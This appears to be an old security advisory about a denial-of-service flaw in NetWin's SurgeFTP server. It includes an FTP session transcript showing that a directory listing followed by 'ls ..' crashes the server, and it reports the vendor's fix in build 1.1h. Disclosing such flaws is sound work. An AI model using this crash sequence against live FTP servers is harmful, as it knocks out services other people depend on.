COMMAND

    SurgeFTP

SYSTEMS AFFECTED

    NetWin's SurgeFTP

PROBLEM

    Following is based on a Strumpf Noir Society Advisories.  NetWin's
    SurgeFTP  is  an  easy  to  manage  and  reliable  FTP server with
    detailed reporting and easy to use management features.   SurgeFTP
    is  available  for  both  the  Unix/Linux  and Windows flavours of
    operating systems.

    Due to a design issue in  the SurgeFTP server a denial of  service
    condition exists in  it which could  allow any user  with local or
    shell access to the host to crash the server.  The problem resides
    in  the  local  handling  of  the directory listing command, which
    after first being successfully initialized will die if followed by
    a "malformed" request.  Example:

        # ftp localhost
        Connected to testbak
        220 SurgeFTP testbak (Version 1.0b)
        User (testbak:(none)): anonymous
        331 Password required for anonymous.
        Password:
        230- Alias      Real path       Access
        230- /          /home           read
        230 User anonymous logged in.
        ftp> ls /
        200 Port command successful.
        150 Opening ASCII mode data connection for file list. (/)
        226 Transfer complete.
        ftp> ls ..
        200 Port command successful.
        150 Opening ASCII mode data connection for file list. (/..)
        -> ftp get:Connection reset by peer

SOLUTION

    Vendor has  been notified  and has  verified the  problem.   Build
    v1.1h has been released, which  fixes this issue.  It's  available
    from

        ftp://ftp.netwinsite.com/pub/surgeftp/